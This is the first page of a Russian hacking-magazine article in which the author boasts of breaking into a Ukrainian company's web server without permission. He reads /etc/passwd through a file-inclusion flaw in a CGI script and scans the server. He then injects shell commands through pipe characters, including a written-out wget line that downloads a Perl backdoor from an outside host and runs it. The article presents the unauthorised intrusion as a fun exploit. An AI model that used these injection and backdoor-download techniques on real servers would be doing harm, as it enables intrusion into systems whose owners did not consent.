Оранжевая революция

Sashiks (lubimovv@inbox.ru)

Хакер, номер #076, стр. 076-048-1

Гуманистическая история взлома украинского сервера

Упорство в жизни – важная штука. Иногда бывает так, что, кажется, возможность что-то сделать уже ушла, однако если не сдаваться и бороться до последнего, все может измениться. Так во всем, и компьютерные взломы не исключение. Сегодня я расскажу тебе захватывающую историю атаки на один украинский сервер, во время осуществления которой у меня несколько раз возникало желание опустить руки. Однако упорство и вера в собственные силы позволили много добиться.

Интро

Я всегда любил фильмы про хакеров. Еще бы, исследования крупных сетей, взлом корпоративных серверов, кража конфиденциальной информации – все это действительно завораживает. И вот однажды поздно вечером я решил немного поиграть в хакеров и повеселиться. Ну что ж, сказано - сделано, just Google it! И вот на экране замелькали сотни разных украинских компаний, но среди прочих мое внимание привлек сайт какой-то непонятной организации, которая торговала то ли солью, то ли дорожным гравием, то ли вообще ничем не торговала, точно не помню. Ресурс привлек мое внимание тем, что в адресе найденной страницы находилась примерно такая строка: www.firmasite.ua/cgi-bin/index.cgi?newsfile=20050106.txt. Тут не надо быть компьютерным бизоном, чтобы догадаться: с помощью этого скрипта возможно просматривать файлы на сервере, а может быть, даже и исполнять команды. Что ж, попробуем.

Указав в качестве параметра newsfile название одного из файлов в текущем каталоге я увидел, что он действительно включился! Тогда я запустил скрипт так: index.cgi?newsfile=http://../../etc/passwd и увидел перед собой файл с учетными записями пользователей.

В принципе пока радоваться особенно было нечему, однако некоторые зацепки уже были. Я зашел на свой забугорный шелл и просканировал nmap’ом удаленный комп в поисках открытых tcp-портов и доступных сетевых демонов. Конечно, можно было сразу подставить вместо имени файла значок пайпа ("|") и ввести команду, однако я не хотел спешить.

Через некоторое время после запуска сканера выяснилось, что на ломаемой тачке кроме всего прочего крутится бажный ProFTPD 1.2.9, для которого есть публичный сплойт: www.securitylab.ru/_exploits/proftpd2.c.txt.

Однако как я и ожидал, этот эксплойт был не работоспособным и не выдал ничего полезного после нескольких минут перебора адреса возврата. Можно было конечно разобраться, в чем дело, однако у меня была идея получше. В имя открываемого файла я подставил строку “|id|" и тут же на главной странице получил убедительный ответ сервера: "nobody" . Ну что ж, пришло время решительных действий.

Внедряемся!

Итак, что у меня было в данный момент на руках. Во-первых, сервер не был защищен файрволом, что не могло не радовать. Во-вторых, я мог просматривать файлы и, что самое важное, выполнять команды с правами вебсервера. Итак, вперед с песней.

Была отдана команда "|wget http://host.ru/bd.pl -O /tmp/bd.pl;perl /tmp/bd.pl|", после чего на тачке, как и предполагалось, открылся всеми любимый перловый бэкдор на 37900 порту.

Содержание  Вперед на стр. 076-048-2
загрузка...
Журнал Хакер #151Журнал Хакер #150Журнал Хакер #149Журнал Хакер #148Журнал Хакер #147Журнал Хакер #146Журнал Хакер #145Журнал Хакер #144Журнал Хакер #143Журнал Хакер #142Журнал Хакер #141Журнал Хакер #140Журнал Хакер #139Журнал Хакер #138Журнал Хакер #137Журнал Хакер #136Журнал Хакер #135Журнал Хакер #134Журнал Хакер #133Журнал Хакер #132Журнал Хакер #131Журнал Хакер #130Журнал Хакер #129Журнал Хакер #128Журнал Хакер #127Журнал Хакер #126Журнал Хакер #125Журнал Хакер #124Журнал Хакер #123Журнал Хакер #122Журнал Хакер #121Журнал Хакер #120Журнал Хакер #119Журнал Хакер #118Журнал Хакер #117Журнал Хакер #116Журнал Хакер #115Журнал Хакер #114Журнал Хакер #113Журнал Хакер #112Журнал Хакер #111Журнал Хакер #110Журнал Хакер #109Журнал Хакер #108Журнал Хакер #107Журнал Хакер #106Журнал Хакер #105Журнал Хакер #104Журнал Хакер #103Журнал Хакер #102Журнал Хакер #101Журнал Хакер #100Журнал Хакер #099Журнал Хакер #098Журнал Хакер #097Журнал Хакер #096Журнал Хакер #095Журнал Хакер #094Журнал Хакер #093Журнал Хакер #092Журнал Хакер #091Журнал Хакер #090Журнал Хакер #089Журнал Хакер #088Журнал Хакер #087Журнал Хакер #086Журнал Хакер #085Журнал Хакер #084Журнал Хакер #083Журнал Хакер #082Журнал Хакер #081Журнал Хакер #080Журнал Хакер #079Журнал Хакер #078Журнал Хакер #077Журнал Хакер #076Журнал Хакер #075Журнал Хакер #074Журнал Хакер #073Журнал Хакер #072Журнал Хакер #071Журнал Хакер #070Журнал Хакер #069Журнал Хакер #068Журнал Хакер #067Журнал Хакер #066Журнал Хакер #065Журнал Хакер #064Журнал Хакер #063Журнал Хакер #062Журнал Хакер #061Журнал Хакер #060Журнал Хакер #059Журнал Хакер #058Журнал Хакер #057Журнал Хакер #056Журнал Хакер #055Журнал Хакер #054Журнал Хакер #053Журнал Хакер #052Журнал Хакер #051Журнал Хакер #050Журнал Хакер #049Журнал Хакер #048Журнал Хакер #047Журнал Хакер #046Журнал Хакер #045Журнал Хакер #044Журнал Хакер #043Журнал Хакер #042Журнал Хакер #041Журнал Хакер #040Журнал Хакер #039Журнал Хакер #038Журнал Хакер #037Журнал Хакер #036Журнал Хакер #035Журнал Хакер #034Журнал Хакер #033Журнал Хакер #032Журнал Хакер #031Журнал Хакер #030Журнал Хакер #029Журнал Хакер #028Журнал Хакер #027Журнал Хакер #026Журнал Хакер #025Журнал Хакер #024Журнал Хакер #023Журнал Хакер #022Журнал Хакер #021Журнал Хакер #020Журнал Хакер #019Журнал Хакер #018Журнал Хакер #017Журнал Хакер #016Журнал Хакер #015Журнал Хакер #014Журнал Хакер #013Журнал Хакер #012Журнал Хакер #011Журнал Хакер #010Журнал Хакер #009Журнал Хакер #008Журнал Хакер #007Журнал Хакер #006Журнал Хакер #005Журнал Хакер #004Журнал Хакер #003Журнал Хакер #002Журнал Хакер #001